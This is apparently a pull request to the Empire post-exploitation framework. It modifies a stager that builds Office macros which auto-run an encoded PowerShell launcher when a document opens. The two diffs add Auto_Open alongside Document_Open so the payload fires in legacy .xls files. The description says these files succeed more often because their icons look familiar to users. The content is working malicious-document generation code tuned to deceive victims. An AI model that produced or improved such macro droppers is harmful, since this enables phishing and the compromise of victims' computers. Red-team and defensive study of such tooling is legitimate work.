### PR TITLE
Added "LegacyMacro" option for Office 97-2003 compatibility 

### DIFF
--- a/lib/stagers/macro.py
+++ b/lib/stagers/macro.py
@@ -44,6 +44,11 @@ class Stager:
                 'Description'   :   'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).',
                 'Required'      :   False,
                 'Value'         :   'default'
+            },
+            'LegacyMacro' : {
+                'Description'   :   'Generate macro compatible with office 97-2003 documents so a ".xls" extension can be used (True or False).',
+                'Required'      :   True,
+                'Value'         :   'False'
             }
         }
 
@@ -65,6 +70,7 @@ class Stager:
         userAgent = self.options['UserAgent']['Value']
         proxy = self.options['Proxy']['Value']
         proxyCreds = self.options['ProxyCreds']['Value']
+        legacyMacro = self.options['LegacyMacro']['Value']
 
         # generate the launcher code
         launcher = self.mainMenu.stagers.generate_launcher(listenerName, encode=True, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds)
@@ -79,7 +85,10 @@ class Stager:
             for chunk in chunks[1:]:
                 payload += "\tstr = str + \"" + str(chunk) + "\"\n"
 
-            macro = "Sub Document_Open()\n"
+            if legacyMacro == 'True':
+                macro = "Sub Auto_Open()\n"
+            else:
+            	macro = "Sub Document_Open()\n"
             macro += "\tDebugging\n"
             macro += "End Sub\n\n"
 

--- a/lib/stagers/macro.py
+++ b/lib/stagers/macro.py
@@ -9,7 +9,7 @@ class Stager:
 
             'Author': ['@enigma0x3', '@harmj0y'],
 
-            'Description': ('Generates an office macro for Empire.'),
+            'Description': ('Generates an office macro for Empire, compatible with office 97-2003, and 2007 file types.'),
 
             'Comments': [
                 'http://enigma0x3.wordpress.com/2014/01/11/using-a-powershell-payload-in-a-client-side-attack/'
@@ -44,11 +44,6 @@ class Stager:
                 'Description'   :   'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).',
                 'Required'      :   False,
                 'Value'         :   'default'
-            },
-            'LegacyMacro' : {
-                'Description'   :   'Generate macro compatible with office 97-2003 documents so a ".xls" extension can be used (True or False).',
-                'Required'      :   True,
-                'Value'         :   'False'
             }
         }
 
@@ -70,7 +65,6 @@ class Stager:
         userAgent = self.options['UserAgent']['Value']
         proxy = self.options['Proxy']['Value']
         proxyCreds = self.options['ProxyCreds']['Value']
-        legacyMacro = self.options['LegacyMacro']['Value']
 
         # generate the launcher code
         launcher = self.mainMenu.stagers.generate_launcher(listenerName, encode=True, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds)
@@ -85,10 +79,10 @@ class Stager:
             for chunk in chunks[1:]:
                 payload += "\tstr = str + \"" + str(chunk) + "\"\n"
 
-            if legacyMacro == 'True':
-                macro = "Sub Auto_Open()\n"
-            else:
-            	macro = "Sub Document_Open()\n"
+            macro = "Sub Auto_Open()\n"
+            macro += "\tDebugging\n"
+            macro += "End Sub\n\n"
+            macro += "Sub Document_Open()\n"
             macro += "\tDebugging\n"
             macro += "End Sub\n\n"
 


### PR DESCRIPTION
The "LegacyMacro" option allows the user to specify if the macro will be used in an Office 97-2003 document (i.e. ".xls" extension) or a modern Office document (i.e. ".xlsm" extension).  This is accomplished by changing the initial "Document_Open" function to "Auto_Open".  We have had good success with the legacy document types, presumably since the icon and extension are more familiar to users.

![excel-icons](https://cloud.githubusercontent.com/assets/3229709/10498103/c578bf5c-7297-11e5-88a8-a6bc75d291bc.jpg)

Tested and working on Windows 7 Enterprise.  I know this isn't a huge change, but if you need any additional clarification just let me know. 


